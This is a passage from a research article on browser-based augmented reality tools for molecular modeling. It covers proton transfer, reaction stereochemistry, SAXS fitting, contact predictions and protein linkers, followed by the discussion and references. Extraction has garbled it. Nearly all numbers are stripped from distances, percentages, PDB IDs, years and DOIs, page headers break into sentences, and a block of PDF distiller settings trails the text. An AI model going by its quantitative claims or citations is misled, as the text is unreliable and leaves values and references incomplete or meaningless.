each marker are hidden or shown as needed to emulate proton transfer). protons “jump” only when they are within Å of the receiving n or o atom; and they are set to jump back and forth to reflect % time-averaged population of protonated lysine and % of protonated glutamate, to convey the feeling of different acidic constants ( −pka) favoring protonation of the base. when Å < n–o distance < Å the web app displays a yellow dotted line that represents a hydrogen bond between the potential receiver heavy atom and the involved proton. similar emulation strategies could be easily used to build “interactive animations” for exploring chemical and physical phenomena of much pedagogical use, as in the phet interactive simulations (moore et al., ) but using ar to directly, almost tangibly, handle molecules. for example, the app shown in fig. b illustrates stereoselectivity in the diels-alder reaction in interactive d. this reaction occurs between a dienophile and a conjugated diene in a concerted fashion, such that the side of the diene where the initial approach occurs defines the stereochemistry of the product. the web app in this example allows users to visualize this in d as they approach a molecule of , -cyclohexadiene on the hiro marker to a molecule of chloroethene on the kanji marker. as the two pairs of reacting c atoms approach each other, the new bonds gain opacity until the product is formed. additionally, the product formed in this reaction is by itself an interesting molecule to visualize and manipulate in ar, because it contains two fused six-membered rings which are hard to understand in d. it should be noted that the examples provided here emulating reactivity are merely pictorial visualizations of the mechanisms, and not based on any kind of quantum calculations. such calculations are too slow to be incorporated into immersive experiences where energies need to be computed on the fly. however, novel machine learning methods that approximate quantum calculations through orders-of-magnitude faster computations (smith, isayev & roitberg, ; bartók et al., ; paruzzo et al., ) could in the near future be coupled to ar/vr systems to interactively explore reactivity in real time. obviously, such tools could be useful not only in education but also in research, for example to interactively test the effect of chemical substituents on a reaction, estimate effects on spectroscopic observables, probe effects of structural changes on abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ molecular orbitals, etc. it is already possible to integrate ar/vr with a physics engine, to add realistic mechanics to the simulation. the web app in fig. h uses cannon.js to simulate thermal motions and thus give a sense of dynamics to the visualized system. in this web app, cannon.js handles the multi-atom system by treating atoms as spheres of defined radii connected by fixed-distance constraints and whose velocities are continuously updated to match the set temperature, leading to rotations around bonds. however, extension of cannon.js to include additional force field terms like dihedral angle terms and electrostatic interactions would be needed to achieve a more complete and realistic modeling experience. ar-based modeling of biological macromolecules figures and already include examples for visualizing certain biological macromolecules, and the previous section introduced ways to incorporate interactivity into these web apps. this section digs deeper into the development of interactive content more relevant to education and research in structural biology, by exploring the incorporation of restraints, simple force fields and on-the-fly simulation of experimental observables for biological macromolecules. the example in fig. c uses javascript to calculate paramagnetic effects on the nuclear magnetic resonance signal of a probe atom (black) attached to the kanji ar marker, as it is moved around the heme group of metmyoglobin attached to the hiro ar marker. by applying standard equations (bertini, turano & vila, ) on the atomic coordinates, this web app simulates the dipolar effects of the paramagnetic iron ion on the probe atom and displays the resulting contribution to the nmr spectrum using the google charts javascript library (https://developers.google.com/chart). the web app shown in fig. a allows exploration of the interaction space of two proteins that are known to form a complex in solution, specifically ubiquitin (red trace) and a ubiquitin-interacting motif (uim, blue trace) taken from pdb id d g (hirano et al., ). the web app simulates on-the-fly the small-angle x-ray scattering (saxs) profiles expected from the relative arrangement of the two proteins, and displays them overlaid onto an experimental profile in real time as the user moves the proteins. this offers a way to interactively test compatibility of possible docking poses with the experimental data. although it cannot compete with the extensive sampling achievable with molecular simulations, such an interactive tool could be useful for preliminary analysis of saxs data before starting complex calculations or to assist interpretation of the results of such calculations. for simplicity and speed, in this example the saxs profile calculation is based on the debye formula iterated through pairs of residues instead of through all pairs of atoms as the full equation requires (debye, ); however, realistic saxs profiles of actual utility in modeling can be achieved with coarse graining strategies and proper parameterization of the scattering centers (stovgaard et al., ). this web app further includes a rudimentary residue-grained force field (i.e., describing each amino acid with one backbone and one side chain bead) to detect clashes, and a predefined binding coordinate which upon activation brings the two molecules together. activation of saxs profile simulation, clash-detecting force field and binding coordinate are controlled abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://developers.google.com/chart http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by voice commands, required because the user’s hands are busy handing the markers. this proceeds through the browser’s cloud-based speech recognition api so does not consume much resources. the successful combination of all these different elements (ar, d visualization, calculations, and speech recognition) illustrates the superb integration capability of libraries for client-side scripting in web browsers. the modularity and simplicity of client-side web programming allows easy adaptation to other kinds of experimental data; for example to residue-specific paramagnetic relaxation enhancements as done by prof. rasia (ibr-conicet-unr, argentina) at https://rrasia.altervista.org/ hyl _ - /hyl _ _minima.html. another example, presented in fig. b shows how ar can help to explore residue- residue contact predictions from residue coevolution data. such predictions provide useful restraints in modern approaches for modeling proteins and their complexes (simkovic et al., ; abriata et al., ; abriata, tamò & dal peraro, ), but often include a fraction of false positives that introduce incorrect information if undetected. interactive inspection of residue-residue contact predictions could help to actively detect false positives through human intervention before the actual restraint-guided modeling proceeds. the example in fig. b shows contacts predicted from coevolution analysis of large sequence alignments for the pair of proteins in chains a and b of pdb id qop, taken from the gremlin server (ovchinnikov, kamisetty & baker, ). each protein is driven by one marker, and the predicted contacts are overlaid as dotted lines connecting the intervening pairs of residues. these lines are colored green, olive and red according to decreasing coevolution score as in the gremlin website, and their widths reflect in real figure interactivity in biological macromolecules. (a) ubiquitin and ubiquitin-interacting motif (red and blue respectively, taken from pdb id d g) driven in d with two ar markers, as the web app computes the predicted saxs profile and displays it overlaid on top of a purported experimental profile together with a metric of the fit quality. (b) interactive exploration of contacts predicted between two proteins (here from coevolution data) before and after manual docking. this example is qop from ovchinnikov et al., where contacts predicted with high score are colored green, contacts of intermediate confidence are olive, and the first contact of low probability is shown red (as taken from the original data). the thickness of the contact lines indicates distance, such that thin lines indicate the residues are close in space. notice how the red contact, which has low probability, remains thicker than the well-scored contacts (green) upon manual docking. full-size doi: . /peerj-cs. /fig- abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://rrasia.altervista.org/hyl _ - /hyl _ _minima.html https://rrasia.altervista.org/hyl _ - /hyl _ _minima.html http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ time the distance between pairs of residues, presumably minimal when contacts are satisfied if the prediction is true. the last prototype application shows rudimentary handling of highly disordered protein regions, in this case to test how a flexible linker made of six glycine residues restricts the space available for exploration and possible docking poses of two well-folded domains (figs. a– c). each folded domain (ubiquitin and ubiquitin-interacting motif, taken from pdb id d g) is modeled at a resolution of two spheres per residue, one centered at the backbone’s alpha carbon and one at the center of mass of the sidechain (i.e., a description slightly coarser than that of the martini force field (marrink et al., )). all spheres representing residues of the folded domains are kept in fixed positions relative to their ar marker, and have radii assigned as the cubic root of the amino acid volumes to roughly respect the relative amino acid sizes (abriata, palzkill & dal peraro, ). the glycine residues of the flexible linker are modeled as single spheres centered at the alpha carbons with their radii set to the cubic root of glycine’s volume. using cannon.js, the spheres representing the glycine residues of the flexible linker (in orange in fig. ) are allowed to move freely but under a fixed-distance constraint from each other and from the corresponding ends of the folded domains. this very simple model can help to answer questions related to the separation of the anchor points and the maximal extension of the linker when straight: how far apart can the two proteins go with the given linker containing six residues? can both proteins be docked through certain interfaces keeping the linker in a relaxed configuration? the user’s investigations are assisted by on-the-fly estimation of entropy associated to given extensions of the linkers, estimated with a worm-like chain model from polymer physics (marko & siggia, ), and by an estimation of the strain experienced by the linker when the user pulls its glycine residues apart beyond their equilibrium distance. discussion achieving seamless integration of immersive visualizations, haptic interfaces and chemical computation stands as one of the key “grand challenges” for the simulation of matter in the st century (aspuru-guzik, lindh & reiher, ). such integration is expected to help us to more easily grasp and explore molecular properties and to efficiently navigate chemical information. in the last two decades several works introduced different ways to achieve ar and vr, as presented in the introduction section. in education, such tools could replace or complement physical (such as plastic-made) modeling kits, augmenting them with additional information about forces, charges, electron distributions, data facts, etc. in research, such tools could help better visualize and probe molecular structure, simulate expected outcomes of experiments and test models and simulated data against experimental data, etc., all through intuitive cues and fluent human-computer interactions. this article introduced a minimal set of building blocks and code for developing marker-based ar applications for molecular modeling in web browsers using regular computers. since web ar is a new and emerging technology, it is reasonable to identify some limitations. naturally, such web apps cannot currently match the graphics quality and interfacing capabilities of programs prepared for specialized ar/vr hardware, and the abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure dynamics of highly disordered protein linkers modeled with rigid-body mechanics. ubiquitin and ubiquitin-interacting motif (pdb id d g) modeled as two to four beads per residue, colored by physi- cochemical properties (gray = hydrophobic, red = negative, blue = positive, green = polar uncharged; backbone beads in black). the domains are driven independently in d with two ar markers. they are connected through a flexible linker of six backbone-sized beads (orange) whose dynamics are treated with the cannon.js rigid-body force field. the web app reports in real time the distance between the centers of both domains, the entropy of the linker based on a worm-like chain model, and the linker strain computed from deviations of distances between consecutive linker beads from an equilibrium distance. (a) the two domains extended as much as possible while keeping the linker relaxed (although entropically unfavored) illustrates the maximum possible separation with the given linker is of around Å. (b) the binding pose between the two domains is geometrically feasible as it keeps the linker relaxed. (c) this other binding pose is unachievable with a linker of this length. full-size doi: . /peerj-cs. /fig- abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ use of a webcam to follow markers can result in unstable tracking under certain conditions compared to setups that use ad hoc devices. another limitation is that support for ar in smartphones is not uniform, and varies greatly between devices. currently, only laptops and desktop computers provide a consistent experience. lastly, content developers must routinely verify that the web apps continue to work in major browsers after updates, and also validate them against new w c standards, apis and libraries. on the bright side, these web apps have some important advantages. first, all examples presented here rely only on client-side programming; therefore, applications need only be uploaded to regular webservers to become available to the world. second, they do not require client-side plugins, so are supported “out of the box” by standard web browsers. third, the modularity of javascript and the availability of several ready-to-use libraries greatly simplify development of new content. fourth, users of these applications do not need to worry about updates, as they always receive the latest version when they reload the page. all in all, these positive features will favor adoption of browser based ar/vr for educational purposes over alternatives that require specialized software and hardware. future perspectives for educational applications, the next stage would be to develop actual content of value for teachers and students. the simplest content could merely provide visualizations to explore molecular geometries, surfaces, orbitals, etc., with specific sets of demos to assist learning of key concepts such as chirality, organic molecules, metal coordination complexes and biomacromolecular structures, to mention just a few cases. by adding mechanics, more complex demos could be created where students could for example interactively explore torsion angles as in the textbook cases of probing the energy landscape of rotation around the central c–c bond of butane, or swapping between chair and boat conformations of six-member rings, exploring hydrogen bonding patterns between neighbor beta strands in a protein, etc. importantly, every single student having a computer at hand could use these apps, not only at the school/university but also at home, therefore this could become an actual learning tool of full-time, individual use. the possibility of reaching the masses with this kind of web technologies for ar-based molecular modeling in turn opens up the opportunity of performing large-scale evaluations of their actual impact in education. as actively investigated by others, there is also a need to explore if full working programs for ar-based molecular modeling may actually become powerful enough to also assist research. here again, web-based tools like those discussed in this article could help to carry out such tests at large scales. some of the prototypes presented here advance possible uses in research, as in the simulation of data from protein–protein docking poses and comparison to the corresponding experimental data in real time. however, some issues should be addressed before creating fully-fledged web programs for research: (i) improving ar marker detection and tracking to stabilize inputs (gao et al., ), (ii) developing some kind of ar marker that is clickable so that users can drag and drop objects in space (hitherto unexplored), (iii) improving graphics, where the possibility of adapting existing web molecular graphics like ngl (rose & hildebrand, ), dmol abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (rego & koes, ), litemol (sehnal et al., in press), mol� (sehnal et al., ), jsmol (hanson et al., ), etc. is particularly enticing, and (iv) developing force fields that correctly handle molecular dynamics and energetics for different tasks, which may imply different levels of granularity for different applications. another global improvement, also important for pedagogical applications, would be incorporating proper object occlusion, which is still non-trivial and subject of studies in the ar community (shah, arshad & sulaiman, ; gimeno et al., ). some further directions that could be explored in the near future are fluently connecting through an ar experience users in physically distant locations, so that they can collaborate on a research project or teach/learn at a distance. adapting future standards for commodity ar/vr in smartphones (plugged into cardboard goggles for stereoscopy) is also worth exploring as this would lead to an even more immersive experience than with the mirror-like apps proposed here. however, since smartphones are more limited in power, their use for ar molecular modeling may require coupling to external computer power. last, pushing the limits towards fully immersive visual analytics for molecular modeling, and especially thinking about solutions useful for research, a few especially enticing additions include support for haptic devices for force feedback, ar without markers (i.e., just by tracking the users’ hands and fingers) and considering occlusion, and as described above, the capability to respond to visual or audio cues by automatically checking databases and mining literature to propose relevant pieces of information. acknowledgements i acknowledge all the members of the communities that develop the client-side web programming tools used here, as well as the very helpful communities who contribute to their improvement, bug detection and correction, documentation, and online help. special thanks to j. ethienne (ar.js developer), nicolò carpignoli (ar.js maintainer), d. mccurdy (google), t. ater (annyang developer), l. stemkoski (adelphi u., usa), a. herráez (u. alcalá, spain) and a. papoutsaki (pomona college, usa) for assistance. i also acknowledge numerous researchers from the physics, chemistry and biology communities who have provided ideas, suggestions, examples and support, especially l. krapp, s. träger, m. dal peraro, f.g. van der goot and m.e. zaballa (epfl, switzerland), a. barducci (cbs, france), d. moreno and g. frattini (iquir-conicet-unr, argentina), and r. rasia (ibr-conicet-unr, argentina). finally, i greatly acknowledge the extremely helpful revisions from the editor and two reviewers. additional information and declarations funding the author received no funding for this work. competing interests the author declares that he has no competing interests. abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions � luciano a. abriata conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: all code is available as a github repo at https://github.com/labriata/prototype-web- apps-for-ar-molecular-modeling/ and also in the links in the article. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abriata la. a. web apps come of age for molecular sciences. informatics ( ): doi . /informatics . abriata la. b. concurrent interactive visualization and handling of molecular structures over the internet in web browsers. arxiv e-prints arxiv: . . abriata la, palzkill t, dal peraro m. . how structural and physicochemical determinants shape sequence constraints in a functional enzyme. plos one ( ):e doi . /journal.pone. . abriata la, rodrigues jpglm, salathé m, patiny l. . augmenting research, education and outreach with client-side web programming. trends in biotechnology ( ): – doi . /j.tibtech. . . . abriata la, tamò ge, dal peraro m. . a further leap of improvement in tertiary structure prediction in casp prompts new routes for future assessments. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . abriata la, tamo g, monastyrskyy m, kryshtafovych a, dal peraro m. . assessment of hard target modeling in casp reveals an emerging role of alignment-based contact prediction methods. proteins: structure, function, and bioinformatics (suppl ): – . aspuru-guzik a, lindh r, reiher m. . the matter simulation (r)evolution. acs central science ( ): – doi . /acscentsci. b . ater t. . annyang. available at https://github.com/talater/annyang. bach b, sicat r, beyer j, cordeil m, pfister h. . the hologram in my hand: how effective is interactive exploration of d visualizations in immersive tangible augmented reality? ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . balo ar, wang m, ernst op. . accessible virtual reality of biomolecular structural models using the autodesk molecule viewer. nature methods ( ): – doi . /nmeth. . bartók ap, de s, poelking c, bernstein n, kermode jr, csányi g, ceriotti m. . machine learning unifies the modeling of materials and molecules. science advances ( ):e doi . /sciadv. . berry c, board j. . a protein in the palm of your hand through augmented reality. biochemistry and molecular biology education ( ): – doi . /bmb. . abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/labriata/prototype-web-apps-for-ar-molecular-modeling/ https://github.com/labriata/prototype-web-apps-for-ar-molecular-modeling/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /informatics http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.tibtech. . . http://dx.doi.org/ . /prot. http://dx.doi.org/ . /acscentsci. b https://github.com/talater/annyang http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /sciadv. http://dx.doi.org/ . /bmb. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bertini i, turano p, vila aj. . nuclear magnetic resonance of paramagnetic metalloproteins. chemical reviews ( ): – doi . /cr a . bolopion a, cagneau b, redon s, régnier s. . haptic feedback for molecular simulation. in: ieee/rsj international conference on intelligent robots and systems, october – , , st. louis. – . bolopion a, cagneau b, redon s, régnier s. . comparing position and force control for interactive molecular simulators with haptic feedback. journal of molecular graphics and modelling ( ): – doi . /j.jmgm. . . . debye p. . zerstreuung von röntgenstrahlen. annalen der physik ( ): – doi . /andp. . dipierro m. . the rise of javascript. computing in science & engineering ( ): – doi . /mcse. . . doutreligne s, cragnolini t, pasquali s, derreumaux p, baaden m. . unitymol: interactive scientific visualization for integrative biology. in: ieee th symposium on large data analysis and visualization (ldav), paris. – . fjeld m, voegtli bm. . augmented chemistry: an interactive educational workbench. in: proceedings of the international symposium on mixed and augmented reality, darmstadt. – . gaffary y, le gouis b, marchal m, argelaguet f, arnaldi b, lécuyer a. . ar feels “softer” than vr: haptic perception of stiffness in augmented versus virtual reality. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . gao qh, wan tr, tang w, chen l. . a stable and accurate marker-less augmented reality registration method. in: international conference on cyberworlds (cw), chester. – . gillet a, sanner m, stoffler d, goodsell d, olson a. . augmented reality with tangible auto-fabricated models for molecular biology applications. in: ieee visualization , austin, tx, usa. ieee. gillet a, sanner m, stoffler d, olson a. . tangible interfaces for structural molecular biology. structure ( ): – doi . /j.str. . . . gimeno j, casas s, portalés c, fernádez m. . addressing the occlusion problem in augmented reality environments with phantom hollow objects. in: ieee international symposium on mixed and augmented reality adjunct (ismar-adjunct), munich. – . goddard td, brilliant aa, skillman tl, vergenz s, tyrwhitt-drake j, meng ec, ferrin te. a. molecular visualization on the holodeck. journal of molecular biology ( ): – doi . /j.jmb. . . . goddard td, huang cc, meng ec, pettersen ef, couch gs, morris jh, ferrin te. b. ucsf chimerax: meeting modern challenges in visualization and analysis. protein science ( ): – doi . /pro. . hanson rm, prilusky j, renjian z, nakane t, sussman jl. . jsmol and the next-generation web-based representation of d molecular structure as applied to proteopedia. israel journal of chemistry ( – ): – doi . /ijch. . hendler j. . communication: enhanced: science and the semantic web. science ( ): – doi . /science. . hirano s, kawasaki m, ura h, kato r, raiborg c, stenmark h, wakatsuki s. . double-sided ubiquitin binding of hrs-uim in endosomal protein sorting. nature structural & molecular biology ( ): – doi . /nsmb . abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /cr a http://dx.doi.org/ . /j.jmgm. . . http://dx.doi.org/ . /andp. http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /j.str. . . http://dx.doi.org/ . /j.jmb. . . http://dx.doi.org/ . /pro. http://dx.doi.org/ . /ijch. http://dx.doi.org/ . /science. http://dx.doi.org/ . /nsmb http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hirst jd, glowacki dr, baaden m. . molecular simulations and visualization: introduction and overview. faraday discussions : – doi . /c fd c. humphrey w, dalke a, schulten k. . vmd: visual molecular dynamics. journal of molecular graphics ( ): – doi . / - ( ) - . jiang c, jin x. . quick way to port existing c/c++ chemoinformatics toolkits to the web using emscripten. journal of chemical information and modeling ( ): – doi . /acs.jcim. b . kato h. . artoolkit. available at http://www.hitl.washington.edu/artoolkit/. krichenbauer m, yamamoto g, taketom t, sandor c, kato h. . augmented reality versus virtual reality for d object manipulation. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . lee j, kim j-i, kang l-w. . a collaborative molecular modeling environment using a virtual tunneling service. journal of biomedicine and biotechnology ( ): – doi . / / . maier p, klinker g. . augmented chemical reactions: d interaction methods for chemistry. international journal of online engineering (ijoe) (s ): doi . /ijoe.v is . . maier p, tönnis m, gudrunklinker d. . dynamics in tangible chemical reactions. world academy of science, engineering and technology : – . marko jf, siggia ed. . statistical mechanics of supercoiled dna. physical review e ( ): – doi . /physreve. . . marrink sj, risselada hj, yefimov s, tieleman dp, de vries ah. . the martini force field: coarse grained model for biomolecular simulations. journal of physical chemistry b ( ): – doi . /jp f. martínez-hung h, garcía-lópez ca, escalona-arranz jc. . augmented reality models applied to the chemistry education on the university (article in spanish). revista cubana de química : – . matthews d. . virtual-reality applications give science a new dimension. nature ( ): – doi . /d - - - . matthews n, kitao a, laycock s, hayward s. . haptic-assisted interactive molecular docking incorporating receptor flexibility. journal of chemical information and modeling ( ): – doi . /acs.jcim. b . moore eb, chamberlain jm, parson r, perkins kk. . phet interactive simulations: transformative tools for teaching chemistry. journal of chemical education ( ): – doi . /ed . müller c, krone m, huber m, biener v, herr d, koch s, reina g, weiskopf d, ertl t. . interactive molecular graphics for augmented reality using hololens. journal of integrative bioinformatics ( ): doi . /jib- - . o’connor m, deeks hm, dawn e, metatla o, roudaut a, sutton m, thomas lm, glowacki br, sage r, tew p, wonnacott m, bates p, mulholland aj, glowacki dr. . sampling molecular conformations and dynamics in a multiuser virtual reality framework. science advances ( ):eaat doi . /sciadv.aat . o’donoghue si, gavin a-c, gehlenborg n, goodsell ds, hériché j-k, nielsen cb, north c, olson aj, procter jb, shattuck dw, walter t, wong b. . visualizing biological data— now and in the future. nature methods (s ):s –s doi . /nmeth.f. . abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /c fd c http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /acs.jcim. b http://www.hitl.washington.edu/artoolkit/ http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . / / http://dx.doi.org/ . /ijoe.v is . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /jp f http://dx.doi.org/ . /d - - - http://dx.doi.org/ . /acs.jcim. b http://dx.doi.org/ . /ed http://dx.doi.org/ . /jib- - http://dx.doi.org/ . /sciadv.aat http://dx.doi.org/ . /nmeth.f. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ovchinnikov s, kamisetty h, baker d. . robust and accurate prediction of residue–residue interactions across protein interfaces using evolutionary information. elife :e doi . /elife. . pafilis e, o’donoghue si, jensen lj, horn h, kuhn m, brown np, schneider r. . reflect: augmented browsing for the life scientist. nature biotechnology ( ): – doi . /nbt - . papoutsaki a, sangkloy p, laskey j, daskalova n, huang j, hays j. . webgazer: scalable webcam eye tracking using user interactions. in: proceedings of the th international joint conference on artificial intelligence, new york. – . paruzzo fm, hofstetter a, musil f, de s, ceriotti m, emsley l. . chemical shifts in molecular solids by machine learning. arxiv preprint arxiv: . doi . /s - - -x. pence he, williams aj, belford re. . new tools and challenges for chemical education: mobile learning, augmented reality, and distributed cognition in the dawn of the social and semantic web. in: garcía‐martínez j, serrano‐torregrosa e, eds. chemistry education. weinheim: wiley-vch verlag gmbh & co. kgaa, – . pimentel v, nickerson bg. . communicating and displaying real-time data with websocket. ieee internet computing ( ): – doi . /mic. . . ratamero em, bellini d, dowson cg, römer ra. . touching proteins with virtual bare hands: visualizing protein-drug complexes and their dynamics in self-made virtual reality using gaming hardware. journal of computer-aided molecular design ( ): – doi . /s - - - . rebholz-schuhmann d, oellrich a, hoehndorf r. . text-mining solutions for biomedical research: enabling integrative biology. nature reviews genetics ( ): – doi . /nrg . rego n, koes d. . dmol.js: molecular visualization with webgl. bioinformatics ( ): – doi . /bioinformatics/btu . rose as, hildebrand pw. . ngl viewer: a web application for molecular visualization. nucleic acids research (w ):w –w doi . /nar/gkv . russel d, lasker k, webb b, velázquez-muriel j, tjioe e, schneidman-duhovny d, peterson b, sali a. . putting the pieces together: integrative modeling platform software for structure determination of macromolecular assemblies. plos biology ( ):e doi . /journal.pbio. . sehnal d, deshpande m, svobodová vařeková r, mir s, berka k, midlik a, pravda l, velankar s, koča j. litemol suite: interactive web-based visualization of large-scale macromolecular structure data. nature methods (in press). sehnal d, rose as, koča j, burley sk, velankar s. . mol�: towards a common library and tools for web molecular graphics. in: proceedings of the workshop on molecular graphics and visual analysis of molecular data, molva ’ , goslar, eurographics association. – . sekhavat ya, zarei h. . enhancing the sense of immersion and quality of experience in mobile games using augmented reality. journal of computing and security : – . shah mm, arshad h, sulaiman r. . occlusion in augmented reality. in: th international conference on information science and digital content technology (icidt ), jeju. – . simkovic f, ovchinnikov s, baker d, rigden dj. . applications of contact predictions to structural biology. iucrj ( ): – doi . /s . abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /elife. http://dx.doi.org/ . /nbt - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /mic. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nrg http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /nar/gkv http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ smith js, isayev o, roitberg ae. . ani- : an extensible neural network potential with dft accuracy at force field computational cost. chemical science ( ): – doi . /c sc a. sommer b, baaden m, krone m, woods a. . from virtual reality to immersive analytics in bioinformatics. journal of integrative bioinformatics ( ): doi . /jib- - . stocks mb, hayward s, laycock sd. . interacting with the biomolecular solvent accessible surface via a haptic feedback device. bmc structural biology ( ): doi . / - - - . stocks mb, laycock sd, hayward s. . applying forces to elastic network models of large biomolecules using a haptic feedback device. journal of computer-aided molecular design ( ): – doi . /s - - - . stone j. . vmd support for vr and interactive md. available at https://www.ks.uiuc.edu/ research/vmd/allversions/interactive_md.html. stovgaard k, andreetta c, ferkinghoff-borg j, hamelryck t. . calculation of accurate small angle x-ray scattering curves from coarse-grained protein models. bmc bioinformatics ( ): doi . / - - - . vega garzón jc, magrini ml, galembeck e. . using augmented reality to teach and learn biochemistry. biochemistry and molecular biology education ( ): – doi . /bmb. . wiebrands m, malajczuk cj, woods aj, rohl al, mancera rl. . molecular dynamics visualization (mdv): stereoscopic d display of biomolecular structure and interactions using the unity game engine. journal of integrative bioinformatics ( ): doi . /jib- - . wollacott am, merz km. . haptic applications for molecular structure manipulation. journal of molecular graphics and modelling ( ): – doi . /j.jmgm. . . . wolle p, müller mp, rauh d. . augmented reality in scientific publications—taking the visualization of d structures to the next level. acs chemical biology ( ): – doi . /acschembio. b . xu k, liu n, xu j, guo c, zhao l, wang h-w, zhang qc. . vrmol: an integrative cloud-based virtual reality system to explore macromolecular structure. biorxiv doi . / . yang s, mei b, yue x. . mobile augmented reality assisted chemical education: insights from elements d. journal of chemical education ( ): – doi . /acs.jchemed. b . abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /c sc a http://dx.doi.org/ . /jib- - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /s - - - https://www.ks.uiuc.edu/research/vmd/allversions/interactive_md.html https://www.ks.uiuc.edu/research/vmd/allversions/interactive_md.html http://dx.doi.org/ . / - - - http://dx.doi.org/ . /bmb. http://dx.doi.org/ . /jib- - http://dx.doi.org/ . /j.jmgm. . . http://dx.doi.org/ . /acschembio. b http://dx.doi.org/ . / http://dx.doi.org/ . /acs.jchemed. b https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers introduction part : overview of building blocks for immersive molecular modeling in web browsers part : prototype web apps showcasing example applications discussion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff 